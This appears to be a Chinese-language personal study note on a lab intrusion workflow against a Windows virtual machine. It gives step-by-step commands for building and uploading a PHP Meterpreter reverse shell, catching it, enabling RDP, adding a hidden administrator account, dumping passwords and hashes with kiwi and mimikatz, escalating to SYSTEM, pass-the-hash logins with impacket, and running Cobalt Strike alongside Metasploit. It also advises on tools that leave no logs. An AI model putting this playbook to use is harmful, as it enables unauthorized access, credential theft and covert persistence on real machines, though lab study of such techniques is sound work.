目录
实现回弹系统权限
基本配置
sfvnom --list payload查看php 的payload怎么生成的(这个不怎么稳定)
Msfvenom -p php/meterpreter/reverse_tcp LHOST=(本身的ip地址) LPORT=12345(这个是端口号) -o sherrre.php(这个是最终输出的php文件)
Cat sherrre.php 查看这个php文件可以看出,它实际上是写了一个php的代码,它是将权限回弹到这个本身的ip地址那去了
Python3 -m http.server 9999用python搭建一个简单的web服务器
登入上去,把刚生成的文件sherrre.php下到桌面上面去,
然后把它上传到另一个虚拟机系统上面去。
上传成功后,就点击去访问它(上浏览器上去访问)
然后回到keil的上面去回联,因为从虚拟机上面反弹给你你就需要监听
Msfconsole
Use exploit/multi/handler
Set payload php/meterpreter/reverse_tcp//这个是反弹型木马,是受害者去主动联系攻击者
Set lhost (keil也就是本地的ip地址)
Set lport 12345(连接端口)
只要有一个回弹的权限就可以监听到(无法就是控制对方的电脑和网站,这个在antsword也可以做的)
它把你的木马弹回来后,接收到然后继续控制。
这个如果控制的Windows那么使用
Getuid是查看用户
命令:Shell进入Windows的窗口下看一下
使用命令:net user 可以查看权限
查看IEUser的权限
然后想去远程登入端口
首先查看想登入的电脑登入端口3389(Windows)是否打开,可能得到的权限不太够
命令:Exit,退出Windows的窗口
Msf post模块开启Windows远程连接3389端口:命令:run post/windows/manage/enable_rdp
然后在进Windows窗口,查看3389端口是否开放
两个方法去登入,直接用管理员去登入,然后还有新建一个用户去登入。
第一种方法新建一个用户去登入
提权
先创建用户放在管理员组去:
命令:Shell,先进去Windows窗口
命令:Net user (名字name) (密码password) /add
看见它在user组下
命令:Net localgroup Adminnistrators (名字name) 添加到管理员组去
然后退出Windows界面
明显添加成功了,
然后再主Windows(也就是自己的电脑)上面去使用远程桌面连接这个应用(输入虚拟机Windows的ip地址,登入自己创建的账号)
Msfconsole的功能
Exploit是漏洞利用程序,Auxiliary是辅助利用程序(前渗透模块,也是还没做,就像是一个哨兵去探查能不能入侵),post是后渗透模块(也就是将权限拿下来了,想要去做进一步的操作,例如远程连接提权等)
Exploit是利用程序
Auxiliary是辅助程序,就是探测里面有没有永恒之蓝这个程序
但是现如今:添加用户是不可取的,因为很容易被发现
命令:Shell,进去Windows界面
去把刚才创建的用户删掉
命令:Net user (用户) /del
第二种方法就是直接去拿到管理员的账号的密码
退出Windows界面
命令:Load kiwi
这个是去抓取Windows系统下的明文密码的
其实密文也可以抓,命令:Hashdump
输入crede_all是获取账户和密码
失败的原因是权限太低了,是管理员组但是不是最高权限。
在Windows下最高权限是system,linux下最高权限是root
然后就需要去提权
命令:Getsystem
这个就是用一个0day生成了一个esep文件自动上传提权,成功就成功失败就失败
命令:Getuid查看用户权限
存在的问题
但是依然存在问题
然后发现user依然是IEUser,权限不够(这里需要提醒一哈,Windows的最高权限是system)
需要把进程迁移到system上面去(也就是进程号)
命令:Mrgrate 14232(这个是进程号)
发现依然没抓到(这里可能是版本的问题,版本太新了也有可能)
先进入mimikate.exe这个模式下
Privilege::debug先把权限加载起来
然后去拿密码
发现拿到的是密文,这怎么办?
解决办法
- 直接拿密文hash值登入
Windows接收账号密码的地方其实是因为程序Winlogon,这程序会接受到账号密码,它会发送给一个进程lsass,会将密码留存一份存在内存中,然后还会加密一份存储在SAM(相当于数据库)下。
然后进去kali中,提供了一种工具impacket
这个目录下面呢,有几个py文件,专注与渗透的
这里面有一个psexec.py,它不需要密码只需要LMhash:NThash值,其实LMhash太弱了就没啥用,现在LMhash前面的内容都是一样的,所以随便写一个都是可以的因为没用这个。
用这个命名:(那个名字@ip地址是虚拟机Windows)
其实不推荐用它,因为会记录日志。
推荐smbexec.py和wmiexec.py,因为不会记录日志
CS
在keli先进去cs目录
Cd /cs/Server
无非就是client去拿到server(在公网)上的数据去共享
需要个连接密码//执行权限
./teamserver IP(自己的ip地址) password(启动密码)
进去客户端
Cd ./cs/Client
./cobaltstrike-client.sh//这一步记得在kail虚拟机里面做有图形化界面(自己的接口ip和启动密码)
设置监听器
Payload
不带less的就是全功能
带less是一个下载器,会从服务端下载下来
要让他中马,就要将这个木马拿下来,所以启动虚拟机上面去,然后启动
这里面还有许多功能:代理、互相传递的功能
Cs与Msf联动
Span是互相传递的功能,你把你的shell传递给msf,msf把shell传递给你
命令:Msfconsole
Use exploit/multi/handler
Set payload php/meterpreter/reverse_http//这个是反弹型木马,是受害者去主动联系攻击者,这里是http是因为cs我们的就是http
Set lhonst 自己的ip地址
Set lport 1234(端口)
Exploit
它就监听在这里了
然后就要用cs进行传递了,进行会话传递保证ip和端口号与ME中设置的一致
这里是Cs直接传递给msf。也就是说msf里面有些功能好用就把功能传递给cs,cs面有些功能好用就把功能传递给msf也就是把(shell)相互传递了一下。